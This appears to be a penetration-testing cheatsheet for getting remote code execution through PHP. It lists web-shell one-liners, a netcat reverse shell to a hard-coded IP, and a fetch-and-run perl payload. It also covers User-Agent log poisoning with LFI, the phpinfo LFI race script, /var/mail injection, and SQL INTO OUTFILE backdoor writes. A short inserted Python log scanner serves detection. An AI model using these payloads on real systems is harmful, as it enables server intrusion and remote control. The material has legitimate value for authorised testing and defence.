PHP RCE

PHP system() / shell_exec()

<?php echo shell_exec($_GET['cmd']);?>
<?php echo system($_REQUEST['hack']); ?>
<?php system($_GET['hack']); ?>

# RFI
<?php system('nc.exe -v 10.11.0.131 4444 -e cmd.exe'); ?>

FreeBSD wget reverse shell

There's no wget in FreeBSD, so use fetch instead:

<?php passthru("mkdir /tmp/temp/ && fetch -qo /tmp/temp/callme.pl http://10.11.0.69/callme.pl && perl /tmp/temp/callme.pl"); ?>

Log poisoning LFI RCE

  1. Using Burp, inject PHP code into the User-Agent header: User-Agent: <?php system($_REQUEST['hack']); ?>

  2. Check that the request was logged at /var/log/httpd-access.log

  3. Use the LFI to get RCE: 10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&hack=uname
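A detection-side complement to the log-poisoning steps above, added here as an example and not part of the original cheatsheet: it parses Apache combined-format access-log lines (the sample entries are constructed) and flags PHP open tags written into the User-Agent or Referer field, as well as requests whose parameters reference the access log itself. The function names analyze_line and scan are my own.

```python
import re
from urllib.parse import unquote

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A PHP open tag has no business in a client-supplied header.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)
# A request parameter pointing at the web server's own log is the
# include-the-poisoned-log half of the technique.
LOG_PATH_RE = re.compile(r'/var/log/|httpd-access\.log|access\.log', re.IGNORECASE)

# Constructed sample lines (not from a real server).
SAMPLE_LOG = """\
10.11.0.131 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.0.131 - - [10/Oct/2023:13:55:40 +0000] "GET /about.php HTTP/1.1" 200 300 "-" "<?php system($_REQUEST['hack']); ?>"
10.11.0.131 - - [10/Oct/2023:13:55:44 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&hack=uname HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.11.0.200 - - [10/Oct/2023:13:56:01 +0000] "GET /browse.php?file=news.txt HTTP/1.1" 200 120 "-" "curl/7.88"
"""

def analyze_line(line):
    """Return a finding dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    findings = []
    # Decode once so URL-encoded tags (%3C%3Fphp) are caught as well.
    if PHP_TAG_RE.search(unquote(m['agent'])) or PHP_TAG_RE.search(unquote(m['referer'])):
        findings.append('php_tag_in_header')
    if LOG_PATH_RE.search(unquote(m['request'])):
        findings.append('log_path_in_request')
    return {'host': m['host'], 'request': m['request'], 'findings': findings}

def scan(text):
    """Scan a whole log and return only the lines that raised a finding."""
    alerts = []
    for line in text.splitlines():
        result = analyze_line(line)
        if result and result['findings']:
            alerts.append(result)
    return alerts
```

Once a PHP tag has landed in the log, the file itself is poisoned until it is rotated, so the first finding is worth acting on even without a matching include request.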

PHPINFO LFI RCE

You have an LFI, can view phpinfo.php, and file uploads are turned on.

(step 1) wget https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/File%20Inclusion/phpinfolfi.py

(Step 2) Modify the payload to include pentestmonkey's reverse shell between the start and end markers.

If the script doesn't work, check the greater-than comparison operators at lines 203 and 262 of the script.

(Step 3) Update the LFI URL in the script (apply a %00 null byte terminator if needed). Note that the script uses % string formatting, so the null byte has to be written as %%00.

(Step 4) Start an nc listener to catch the reverse shell, then run the python script:

python phpinfolfi.py 10.10.10.84 80 100

LFI RCE using /var/mail

See the SMTP cheatsheet; send an email whose body contains the PHP below:

<?php echo system($_REQUEST['hack']); ?>

Using Burp Suite, execute the RCE through the LFI and pass commands with the hack parameter:

../var/mail/emailUserName..........&hack=whoami

MySQL: writing a PHP file that wgets a reverse shell

select "<?php shell_exec('wget http://10.10.14.4/php-reverse-shell.php -O shell1.php'); ?>" into outfile "/var/www/html/dlexp.php"

SQL Code Execution

select "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"

SQL Create file using INTO OUTFILE

10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
